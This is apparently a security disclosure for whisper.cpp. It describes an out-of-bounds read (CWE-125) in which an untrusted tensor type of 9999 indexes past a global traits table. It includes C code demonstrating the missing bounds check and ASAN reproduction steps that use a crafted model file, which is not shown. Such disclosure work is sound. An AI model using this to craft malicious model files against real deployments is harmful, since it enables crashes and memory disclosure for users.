PoC: Global Buffer OOB Read in whisper.cpp via Invalid Tensor Type

Format: GGML (.bin)
Target: whisper.cpp (ggml-org/whisper.cpp)
CWE: CWE-125 (Out-of-bounds Read)

Vulnerability

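The tensor type read from the model file is used as an array index without a bounds check, causing a global buffer out-of-bounds read. A tensor with ttype=9999 indexes past the 40-element ggml_type_traits[] global array and reads arbitrary global memory.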
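The missing check, shown as an added example that is not code from whisper.cpp or from this repo: an untrusted tensor type is validated against the table size before it is used as an index. The table, the `demo_*` names and the three-field header layout are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for a global per-type traits table (not ggml's). */
enum { DEMO_TYPE_COUNT = 4 };
struct demo_traits { const char *name; size_t type_size; };
static const struct demo_traits demo_type_traits[DEMO_TYPE_COUNT] = {
    { "f32", 4 }, { "f16", 2 }, { "i8", 1 }, { "i32", 4 },
};

/* Decode a little-endian int32 independent of host byte order. */
static int32_t rd_le32(const uint8_t *p) {
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return (int32_t)v;
}

/* Bounds-checked lookup: 0 on success, -1 if ttype is not a valid index.
 * The file field is signed, so negative values are rejected too. */
int demo_type_size_checked(int32_t ttype, size_t *out) {
    if (ttype < 0 || ttype >= DEMO_TYPE_COUNT) return -1;
    *out = demo_type_traits[ttype].type_size;
    return 0;
}

/* Validate an untrusted tensor header before any table lookup.
 * Assumed layout: int32 n_dims, int32 name_len, int32 ttype. */
int demo_parse_header(const uint8_t *buf, size_t len, size_t *elem_size) {
    if (buf == NULL || len < 12) return -1;   /* truncated header */
    return demo_type_size_checked(rd_le32(buf + 8), elem_size);
}

int main(void) {
    /* Constructed header: n_dims=1, name_len=4, ttype=9999 (0x270F). */
    const uint8_t hdr[12] = { 1,0,0,0, 4,0,0,0, 0x0F,0x27,0,0 };
    size_t sz = 0;
    if (demo_parse_header(hdr, sizeof hdr, &sz) != 0)
        puts("rejected: tensor type out of range");
    return 0;
}
```

A loader that applies this check fails the model load cleanly instead of reading past the end of the traits table.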

Reproduction

git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
mkdir build-asan && cd build-asan
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
make -j$(nproc)
./bin/whisper-cli -m ../poc_global_oob.bin -f /dev/null

ASAN reports: global-buffer-overflow READ at ggml.c:1272

Tested: whisper.cpp commit 364c77f4
